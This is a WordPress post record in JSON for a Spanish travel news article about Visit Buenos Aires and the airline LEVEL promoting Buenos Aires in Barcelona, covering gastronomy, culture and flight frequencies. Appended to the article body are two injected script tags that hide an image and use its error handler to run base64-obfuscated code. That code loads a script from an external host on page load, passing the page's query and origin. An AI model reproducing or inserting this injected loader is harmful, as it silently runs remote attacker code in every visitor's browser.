{"id":2752,"date":"2023-06-21T10:14:14","date_gmt":"2023-06-21T13:14:14","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2752"},"modified":"2025-08-14T00:14:38","modified_gmt":"2025-08-14T03:14:38","slug":"buenos-aires-y-level-presentan-las-novedades-del-destino-en-barcelona","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2752","title":{"rendered":"Buenos Aires y LEVEL presentan las novedades del destino en Barcelona"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-vivid-cyan-blue-background-color has-text-color has-background\" style=\"color:#056116\"><em>LEVEL es la \u00fanica aerol\u00ednea que conecta directamente Barcelona y Buenos Aires con seis frecuencias semanales en verano que ascienden hasta nueve durante algunos periodos del pr\u00f3ximo invierno<\/em><\/h3>\n\n\n\n<p>Visit Buenos Aires, la agencia p\u00fablico-privada de promoci\u00f3n internacional de la ciudad, realiz\u00f3 una presentaci\u00f3n de destino en Barcelona para periodistas y agencias de viajes. El evento cont\u00f3 tambi\u00e9n con la compa\u00f1\u00eda LEVEL, con qui\u00e9n la entidad ha firmado un convenio de colaboraci\u00f3n gracias al cual, se est\u00e1n realizando diferentes actividades promocionales de la Ciudad de Buenos Aires como destino tur\u00edstico en Espa\u00f1a.<\/p>\n\n\n\n<p>Con el objetivo de posicionar a Buenos Aires como el destino m\u00e1s atractivo de Am\u00e9rica Latina, con foco en los segmentos estrat\u00e9gicos MICE, turismo de lujo y LGBTQ+, Mar\u00eda Laura Pierini, Gerente de Promoci\u00f3n de Visit Buenos Aires, present\u00f3 las principales novedades gastron\u00f3micas y culturales de la ciudad y se realiz\u00f3 una experiencia inmersiva donde los invitados conocieron el ritual y el sabor de la yerba mate.<\/p>\n\n\n\n<p>Espa\u00f1a es uno de los principales mercados para la ciudad, ubic\u00e1ndose como el segundo en viajes de larga distancia, por detr\u00e1s de Estados Unidos. Asimismo, es el quinto en turistas internacionales que llegaron a la Ciudad de Buenos Aires en 2022. &nbsp;En los meses de febrero y marzo del corriente a\u00f1o se alcanzaron casi los mismos niveles que prepandemia<\/p>\n\n\n\n<p>\u00abDesde Visit Buenos Aires estamos felices de poder venir a contar las novedades de la ciudad a Barcelona. Para nosotros es un mercado de suma importancia y de la mano de LEVEL esperamos continuar recibiendo cada vez m\u00e1s turistas de Barcelona en Buenos Aires\u00bb, afirm\u00f3 Karina Perticone, directora ejecutiva de Visit Buenos Aires.<\/p>\n\n\n\n<p>Buenos Aires, una ciudad en movimiento<\/p>\n\n\n\n<p>La Ciudad de Buenos Aires posee una oferta enorme que combina atractivos tradicionales con experiencias gastron\u00f3micas, actividades culturales p\u00fablicas, privadas e independientes y circuitos al aire libre para recorrer en todos los barrios de la Ciudad.<\/p>\n\n\n\n<p>En ese sentido, la gastronom\u00eda, contin\u00faa siendo un must para turistas y residentes. Los restaurantes de alta gama en los distintos barrios de la ciudad ofrecen platos elegantes y sofisticados. La Ciudad de Buenos Aires cuenta con m\u00e1s de 7.000 bares y restaurantes, muchos de ellos reconocidos entre los mejores de Latinoam\u00e9rica y el mundo.<\/p>\n\n\n\n<p>En sinton\u00eda con este movimiento foodie, el resurgimiento de los antiguos mercados barriales comenz\u00f3 a materializarse hace unos a\u00f1os con la puesta en valor que encar\u00f3 el Gobierno de los tradicionales mercados de San Telmo, Belgrano y San Nicol\u00e1s, as\u00ed como sucedi\u00f3 con la refuncionalizaci\u00f3n del Patio de los Lecheros de Caballito, por citar algunos ejemplos.<\/p>\n\n\n\n<p>La apertura de nuevos mercados gastron\u00f3micos es otra de las novedades que se suman a la oferta tradicional. El Mercado de los Carruajes, Mercat en Villa Crespo o el Mercado del Soho en Palermo son nuevas propuestas donde con una impronta urbana y dise\u00f1o vanguardista, conviven propuestas gourmet, productos naturales, degustaciones, charlas, eventos y entretenimiento. Otra de las tendencias que se impusieron y generaron nuevas propuestas en la ciudad es la de los rooftops y terrazas al aire libre que ofrecen tragos de autor y gastronom\u00eda de excelencia junto a las mejores vistas de la Ciudad.<\/p>\n\n\n\n<p>Entre las novedades del 2023, la Confiter\u00eda La Ideal reabri\u00f3 sus puertas tras permanecer cerrada por m\u00e1s de 6 a\u00f1os. La Ideal es uno de los bares hist\u00f3ricos emblem\u00e1ticos de la Ciudad. Fue fundada en 1912 por el comerciante espa\u00f1ol Manuel Rosendo Fern\u00e1ndez y es una joya arquitect\u00f3nica por la que pasaron presidentes, m\u00fasicos y escritores. Por las ma\u00f1anas sol\u00eda ir Jorge Luis Borges; Carlos Gardel era un fan\u00e1tico del lugar; Charlie Watts, el baterista de Rolling Stones, tambi\u00e9n la visit\u00f3, al igual que Yoko Ono. Allan Parker qued\u00f3 deslumbrado con La Ideal, por eso decidi\u00f3 filmar all\u00ed escenas de la pel\u00edcula \u00abEvita\u00bb.<\/p>\n\n\n\n<p>Otra de las novedades es la finalizaci\u00f3n de la puesta en valor del Mercado de San Telmo, uno de los mercados m\u00e1s antiguos de la Ciudad, icono y punto de encuentro obligado del barrio y turistas que llegan a Buenos Aires, todos los d\u00edas del a\u00f1o.<\/p>\n\n\n\n<p>En el plano cultural, una de las principales novedades es Col\u00f3n Fabrica, un espacio interactivo donde el visitante puede descubrir las grandes producciones surgidas de los talleres de uno de los pocos Teatros F\u00e1brica del mundo, en el que se puede crear y realizar todo lo que necesita una programaci\u00f3n de excelencia: escenograf\u00edas, trajes, pelucas, zapatos, efectos especiales. Un espacio \u00fanico en la Ciudad, donde conviven el arte y el patrimonio, la producci\u00f3n de nivel internacional y los ancestrales oficios teatrales.<\/p>\n\n\n\n<p>El arte urbano y las intervenciones con grafitis est\u00e1n en Hollywood, en San Pablo, en Londres, en Nueva York&#8230; y tambi\u00e9n en Buenos Aires. Las paredes porte\u00f1as alojan uno de los movimientos de arte urbano m\u00e1s activos de Am\u00e9rica Latina.<\/p>\n\n\n\n<p>De todo el mundo llegan artistas para convertir muros grises en un museo al aire libre. Sin esperar nada a cambio, trabajan en equipo con sus pares locales, que viajan cada a\u00f1o para mostrar su trabajo en galer\u00edas y festivales del exterior. El arte urbano en la ciudad est\u00e1 regulado desde 2009 en la ley de muralismo, una cultura que se desarroll\u00f3 en las calles desde \u00e9pocas muy tempranas, siguiendo los vaivenes pol\u00edticos. Las intervenciones deben contar con la aprobaci\u00f3n del due\u00f1o de la propiedad.<\/p>\n\n\n\n<p>Los barrios m\u00e1s coloridos para visitar son Palermo, Colegiales, Villa Crespo, Congreso, Barracas, Montserrat y La Boca. Los turistas pueden conocer las diferentes expresiones art\u00edsticas y recorridos autoguiados con obras para todos los gustos: ruta tradicional y ruta emergente.<\/p>\n\n\n\n<p>LEVEL, la \u00fanica aerol\u00ednea que conecta de forma directa Barcelona y Buenos Aires<\/p>\n\n\n\n<p>Para la compa\u00f1\u00eda de largo radio de la Ciudad Condal, la capital de Argentina es un destino estrat\u00e9gico y as\u00ed lo demuestra, con una operativa reforzada y ambiciosa. De hecho, es la \u00fanica aerol\u00ednea del aeropuerto de Barcelona que une, sin escalas, ambas ciudades.<\/p>\n\n\n\n<p>Esta temporada de verano, LEVEL vuela a Buenos Aires con hasta seis frecuencias por semana. Hasta el mes de septiembre, la ruta se opera cinco d\u00edas por semana y los vuelos salen los lunes, martes, mi\u00e9rcoles, viernes y s\u00e1bados. En septiembre y octubre, la frecuencia asciende a seis vuelos a la semana, a\u00f1adiendo un servicio los jueves. A partir de noviembre, y coincidiendo con la temporada de invierno, LEVEL alcanza las nueve frecuencias a la semana, ofreciendo un m\u00ednimo de un vuelo diario durante toda la temporada de invierno, que es de noviembre a marzo.<\/p>\n\n\n\n<p>La ruta entre Barcelona y Buenos Aires es una apuesta consolidada y muy relevante en el mapa de destinos de LEVEL, ya que ha ido reforz\u00e1ndose desde su inicio en 2017. Este verano la aerol\u00ednea ha incrementado en un 6% la capacidad ofertada respecto al verano pasado, lo que se traduce en m\u00e1s de 3.500 asientos semanales conectando Barcelona y la capital argentina.<\/p>\n\n\n\n<p>En la operativa de invierno, el incremento de capacidad asciende hasta un 23% respecto al invierno pasado, con m\u00e1s de 5.600 asientos semanales en los momentos de m\u00e1xima operaci\u00f3n. Cifras que ponen de manifiesto el compromiso de LEVEL con la ruta. Adem\u00e1s de ser un destino tur\u00edstico de referencia, Buenos Aires comparte con Barcelona m\u00faltiples lazos culturales, sociales y empresariales, motivo por el cual la aerol\u00ednea de largo radio de la Ciudad Condal contempla esta ruta como una de sus m\u00e1s estrat\u00e9gicas.<\/p>\n\n\n\n<p>Marc S\u00e1ez, Senior Revenue Management &amp; Pricing Analyst en LEVEL: \u00abPara la compa\u00f1\u00eda, el compromiso con esta ruta es fuerte y as\u00ed se ha demostrado apostando de forma continuada por ella. Nuestra clientela es muy receptiva con esta ruta y nos demuestra que siempre tiene ganas de viajar a Buenos Aires, especialmente, durante el verano austral\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/es.travel2latam.com\/news-82639-Francia-el-pais-ideal-para-sonar-en-grande-y-vivir-sin-prisa\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/Captura-web_21-6-2023_10435_es.travel2latam.com_.jpeg\" alt=\"\" class=\"wp-image-2753\" width=\"252\" height=\"74\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>LEVEL es la \u00fanica aerol\u00ednea que conecta directamente Barcelona y Buenos Aires con seis frecuencias semanales en verano que ascienden hasta nueve durante algunos periodos del pr\u00f3ximo invierno Visit Buenos Aires, la agencia p\u00fablico-privada de promoci\u00f3n internacional de la ciudad, realiz\u00f3 una presentaci\u00f3n de destino en Barcelona para periodistas y agencias de viajes. El evento [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2754,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[18],"tags":[],"class_list":{"0":"post-2752","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2752"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2752"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2752\/revisions"}],"predecessor-version":[{"id":7052,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2752\/revisions\/7052"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2754"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2752"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2752"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2752"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}